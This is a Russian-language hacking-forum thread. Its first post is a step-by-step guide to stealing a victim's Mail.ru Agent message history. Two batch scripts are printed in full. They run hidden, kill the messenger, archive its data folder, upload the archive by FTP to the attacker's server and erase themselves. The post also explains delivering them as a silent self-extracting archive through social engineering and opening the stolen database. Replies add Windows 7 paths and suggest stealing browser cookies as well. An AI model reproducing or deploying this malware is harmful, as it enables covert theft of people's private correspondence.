HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости Mail-сервис
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 18.02.2012, 01:00
mir546
Новичок
Регистрация: 11.11.2011
Сообщений: 4
С нами: 7633046

Репутация: 1
По умолчанию

Для осуществления хака потребуется СИ(социальная инженерия) и сервер. Я использовал бесплатный срев на http://www.webservis.ru
Будем заливать переписку из "Mail.ru Агента" на сервер, при помощи bat файлов(Win XP) и двух утилит.

Нам понадобится утилиты "Rar.exe" и "offsee.exe"(hidec)


Скачать утилиту для архивации "Rar.exe"

Скачать утилиту для скрытия cmd "offsee.exe"

Первый бат-файл я назвал «start» его содержание:

code:

@echo off
offsee.exe "bod.bat"
exit

он запускает второй батник через утилиту “hidec” с названием «offsee.exe» которая скроет консольное окно.

Второй бат-файл я назвал «bod» его содержание:
Спойлер
@echo off
set name=%usernamee%_%date%
attrib +H +S "bod.bat"
attrib +H +S "offsee.exe"
attrib +H +S "Rar.exe"
attrib +H +S "start.bat"
echo open Ваш_сервер >> ftpcmd
attrib +H +S "ftpcmd"
echo USER Логин Пароль >> ftpcmd
echo binary >> ftpcmd
echo quote PASV >> ftpcmd
echo cd public_html >> ftpcmd
echo put "\serv\%name%-Mra.rar" >> ftpcmd
echo disconnect >> ftpcmd
echo close >> ftpcmd
echo bye >> ftpcmd
taskkill /f /t /fi "MODULES eq YLUSBTEL.dll"
md "\serv"
attrib +H +S "\serv"
md "\serv\%name%"
rd /s /q "%appdata%\Mra\Avatars"
xcopy "%appdata%\Mra" "\serv\%name%" /s /c /g /h /r /y /q
Rar A -r -ep1 -df -m4 "\serv\%name%-Mra.rar" "\serv\%name%"
ftp -s:ftpcmd -n -v
rd /s /q "\serv"
attrib -H -S "ftpcmd"
del /f /q "ftpcmd"
attrib -H -S "Rar.exe"
del /f /q "Rar.exe"
attrib -H -S "start.bat"
del /f /q start.bat
attrib -H -S "offsee.exe"
del /f /q offsee.exe
del /f /q start.exe
attrib -H -S "bod.bat"
del /f /q %0
exit

Он завершит процесс Агента, скопирует, заархивирует переписку в rar, переименует в ИмяПользователя_Дата-Mra.rar и зальёт архив на ваш сервер.

Ключевые моменты: вместо «Ваш_сервер» нужно ввести адрес вашего серва. «Логин» «Пароль», соответственно то-же ваш логин и пароль. В строке
del /f /q start.exe
«start.exe» заменить на название фала само-распаковки(SFX-архив).

Лучше, конечно, все 4 файла залить в SFX-архив, с параметрами:
"Путь распаковки" - Создать в текущей папке
"Программа установки, Выполнить после установки" - start.bat
"Режим вывода информации" - Скрыть всё

Получившиеся приложение, само-собой, нужно дать жертве, что-бы она его открыла.

Украли, как прочитать? Тут два варианта:
1)В архиве, открыть файл находящийся в Mra\Base\mra.dbs с помощью программы "magent-hr3.0" Программа читает первые 1500 сообщений, а дальше нет.
Скачать "magent-hr3.0"
"Сайт" программы

2.1 Отключиться от интернета, установить М-Агент на комп, в папке "Mra"(%appdata%\Mra или Application Data\Mra) заменить все файлы и папки на файлы и папки из нашего архива.
2.2 Запустить М-Агент, ввести е-маил жертвы, ввести любой пароль и нажать "Сохранить пароль", далее можно смотреть полную переписку с кем угодно.

PS Естественно все это работает когда у жертвы WinXp и переписка не удалена самой жертвой.
PPS Будут вопросы, предложения, ошибки по моему "приложению" - пишите тут.
PPPS Всё в ознакомительных целях, автор ответственности не несёт.
 
Ответить с цитированием

  #2  
Старый 18.02.2012, 01:00
zhasulan_kz
Новичок
Регистрация: 09.08.2011
Сообщений: 2
С нами: 7768406

Репутация: 0
По умолчанию

А почему работает тоолько на WinXp ! а на Win 7 не работает что ли? (сейчас же почти у всех семерка?)
 
Ответить с цитированием

  #3  
Старый 19.02.2012, 01:00
mir546
Новичок
Регистрация: 11.11.2011
Сообщений: 4
С нами: 7633046

Репутация: 1
По умолчанию

Цитата:

Сообщение от zhasulan_kz

А почему работает тоолько на WinXp ! а на Win 7 не работает что ли? (сейчас же почти у всех семерка?)

Должно работать, лично я не пробовал. почти... да не у всех, большинство моих знакомых "разочаровавшись" в семерке ставят себе XP.
 
Ответить с цитированием

  #4  
Старый 19.02.2012, 01:00
haker_ru
Новичок
Регистрация: 16.02.2012
Сообщений: 3
С нами: 7493366

Репутация: 0
По умолчанию

Отпишитесь у кого робит?
 
Ответить с цитированием

  #5  
Старый 11.03.2012, 01:00
Drago56
Новичок
Регистрация: 01.03.2012
Сообщений: 13
С нами: 7473206

Репутация: 0
По умолчанию

А если такое только на одноклассники???
 
Ответить с цитированием

  #6  
Старый 15.03.2012, 01:00
Middnight
Новичок
Регистрация: 15.03.2012
Сообщений: 2
С нами: 7453046

Репутация: 0
По умолчанию

Дорогие друзья, помогите разобраться с MAIL.RU агентом, нужна история, есть вайлы mra.dbs, пароли логины, все есть вообщем, нужно ее от туда как-то извлеч
 
Ответить с цитированием

  #7  
Старый 15.03.2012, 01:00
Middnight
Новичок
Регистрация: 15.03.2012
Сообщений: 2
С нами: 7453046

Репутация: 0
По умолчанию

не работает данная программа....
дело в том что агент с кпк...
и нужна вся история
 
Ответить с цитированием

  #8  
Старый 22.04.2012, 01:00
koroven
Новичок
Регистрация: 22.04.2012
Сообщений: 2
С нами: 7398326

Репутация: 0
По умолчанию

Друзья, помогите разобраться с созданием сервера, попробовал создать на предлагаемом сайте, но в итоге пишет - "Страница в стадии разработки
зайдите позднее" . во всём остальном всё понятно .
 
Ответить с цитированием

  #9  
Старый 22.04.2012, 01:00
Suicide[VII]
Постоянный
Регистрация: 15.04.2011
Сообщений: 396
С нами: 7935446

Репутация: 49
По умолчанию

Можно и проще в новом выпуске хакера публиковали одну прогу.. и с ней идут(2 консольные ):

Цитата:


magent_copy_kill.exe
mra_read.exe



Прикрутить из к батнику.. и заливать можно уже готовую историю.
 
Ответить с цитированием

  #10  
Старый 22.04.2012, 01:00
tomichek)
Познающий
Регистрация: 13.04.2012
Сообщений: 77
С нами: 7411286

Репутация: 0
По умолчанию

На XP и 7-ке разница в целях лазейке этой то, пути только разные, т.е. у 7-ки до архива Агента(любой версии) до History надо преодолеть:C:\Users\ИМЯ_ПОЛЬЗО АТЕЛЯ\AppData\Roaming\Mra\Base\mra.dbs,opt.d bs
На XP путь:C:\Documents and Settings\имя пользователя\Application DataMra\Base\mra.dbs,opt.dbs Только этим и отличается не работоспособность этого "виря" на 7-ке. Я бы ещё от "жертвы" несколько файлов отсюда прихватил бы:C:\Users\имя пользователя\AppData\Roaming\Mra\Updat e\russian.aff,russian.dict,russian.hash,usermade.d ict.

P.S. А лучше всего, такой тулзой "cookie" уганять с браузера/ов ламера для разносторонности.
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.